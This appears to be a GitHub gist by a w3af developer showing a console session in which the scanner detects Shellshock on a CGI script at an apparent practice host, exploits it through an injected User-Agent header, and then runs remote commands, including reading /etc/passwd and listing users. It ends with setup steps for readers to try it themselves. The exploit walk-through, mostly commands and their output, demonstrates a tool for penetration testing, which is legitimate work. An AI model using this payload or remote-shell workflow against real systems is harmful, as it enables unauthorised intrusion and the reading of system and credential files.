Last active
August 29, 2015 14:06
-
-
Save andresriancho/1a259f01312c0c5ddd1e to your computer and use it in GitHub Desktop.
w3af can now exploit shell shock!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
w3af>>> plugins | |
w3af/plugins>>> audit shell_shock | |
w3af/plugins>>> back | |
w3af>>> target | |
w3af/config:target>>> set target http://shellshock.notsosecure.com/cgi-bin/status | |
w3af/config:target>>> back | |
The configuration has been saved. | |
w3af>>> start | |
Shell shock was found at: "http://shellshock.notsosecure.com/cgi-bin/status", using HTTP method GET. | |
The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"". | |
This vulnerability was found in the request with id 33. | |
Scan finished in 8 seconds. | |
Stopping the core... | |
w3af>>> exploit | |
w3af/exploit>>> exploit os_commanding | |
os_commanding exploit plugin is starting. | |
Vulnerability successfully exploited. | |
Generated shell object <os_commanding object (ruser: "pentesterlab" | | |
rsystem: "Linux vulnerable 3.14.1-pentesterlab")> | |
Vulnerability successfully exploited. This is a list of available shells and proxies: | |
- [0] <os_commanding object (ruser: "pentesterlab" | rsystem: "Linux vulnerable 3.14.1-pentesterlab")> | |
Please use the interact command to interact with the shell objects. | |
w3af/exploit>>> interact 0 | |
Execute "exit" to get out of the remote shell. | |
Commands typed in this menu will be run through the os_commanding shell. | |
w3af/exploit/os_commanding-0>>> e cat /etc/passwd | |
root:x:0:0:root:/root:/bin/sh | |
lp:x:7:7:lp:/var/spool/lpd:/bin/sh | |
nobody:x:65534:65534:nobody:/nonexistent:/bin/false | |
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh | |
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh | |
w3af/exploit/os_commanding-0>>> e ls -la / | |
total 4 | |
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 . | |
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 .. | |
drwxr-xr-x 2 root root 1500 Sep 25 12:05 bin | |
drwxr-xr-x 2 root root 60 Sep 25 12:05 boot | |
drwxrwxr-x 14 root staff 4360 Sep 25 12:05 dev | |
drwxr-xr-x 10 root root 800 Sep 25 14:42 etc | |
drwxrwxr-x 3 root staff 60 Sep 25 12:05 home | |
-rwxr-xr-x 1 root root 496 Sep 25 09:57 init | |
drwxr-xr-x 5 root root 860 Sep 25 12:05 lib | |
lrwxrwxrwx 1 root root 11 Sep 25 12:05 linuxrc -> bin/busybox | |
drwxr-xr-x 4 root root 80 Sep 25 12:05 mnt | |
drwxr-xr-x 2 root root 160 Sep 25 12:05 opt | |
dr-xr-xr-x 68 root root 0 Sep 25 12:05 proc | |
drwxrwxr-x 2 root staff 120 Sep 25 12:28 root | |
drwxrwxr-x 4 root staff 80 Sep 25 12:05 run | |
drwxr-xr-x 2 root root 1200 Sep 25 12:05 sbin | |
dr-xr-xr-x 12 root root 0 Sep 25 12:05 sys | |
drwxrwxrwt 4 root staff 140 Sep 25 12:54 tmp | |
drwxr-xr-x 8 root root 200 Sep 25 12:05 usr | |
drwxr-xr-x 9 root root 200 Sep 25 06:30 var | |
w3af/exploit/os_commanding-0>>> e whoami | |
pentesterlab | |
w3af/exploit/os_commanding-0>>> help | |
Available commands: | |
help Display this information | |
lsp List payloads | |
payload <payload> Execute "payload" and get the result | |
read <file> Read the remote server <file> and echo to this console | |
write <file> <content> Write <content> to the remote <file> | |
upload <local> <remote> Upload <local> file to <remote> location | |
execute <cmd> | |
exec <cmd> | |
e <cmd> Run <cmd> on the remote operating system | |
exit Exit this shell session | |
w3af/exploit/os_commanding-0>>> lsp | |
apache_config_directory | |
apache_config_files | |
apache_htaccess | |
apache_mod_security | |
... | |
udp | |
uptime | |
users | |
users_config_files | |
w3af_agent | |
w3af/exploit/os_commanding-0>>> payload users | |
|----------------------------------------------------------------------------| | |
| User | Home directory | Shell | Description | | |
|----------------------------------------------------------------------------| | |
| nobody | /nonexistent/ | /bin/false | nobody | | |
| root | /root/ | /bin/sh | root | | |
| tc | /home/tc/ | /bin/sh | Linux User | | |
| lp | /var/spool/lpd/ | /bin/sh | lp | | |
| pentesterlab | /home/pentesterlab/ | /bin/sh | Linux User | | |
|----------------------------------------------------------------------------| | |
w3af/exploit/os_commanding-0>>> payload cpu_info | |
|-----------------------------------------------------------------------------| | |
| Description | Value | | |
|-----------------------------------------------------------------------------| | |
| cpu_info | AMD Opteron(TM) Processor 6272 | | |
| cpu_cores | 1 | | |
|-----------------------------------------------------------------------------| | |
w3af/exploit/os_commanding-0>>> payload uptime | |
|----------------------------------------------------------------------------| | |
| Description | Hours | Minutes | Seconds | | |
|----------------------------------------------------------------------------| | |
| idletime | 25 | 16 | 54 | | |
| uptime | 25 | 17 | 37 | | |
|----------------------------------------------------------------------------| | |
w3af/exploit/os_commanding-0>>> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Exploitation is really cool since it doesn't require any third-party host to create a reverse shell, receive the result, etc. nor requires any staging payload: it's all done in one HTTP request/response loop.
The shell-shock exploit source code is available here and as you'll be able to see it fits right into our framework.
Try it yourself!
git clone https://github.com/andresriancho/w3af.git cd w3af git checkout develop ./w3af_console
And then type the commands above.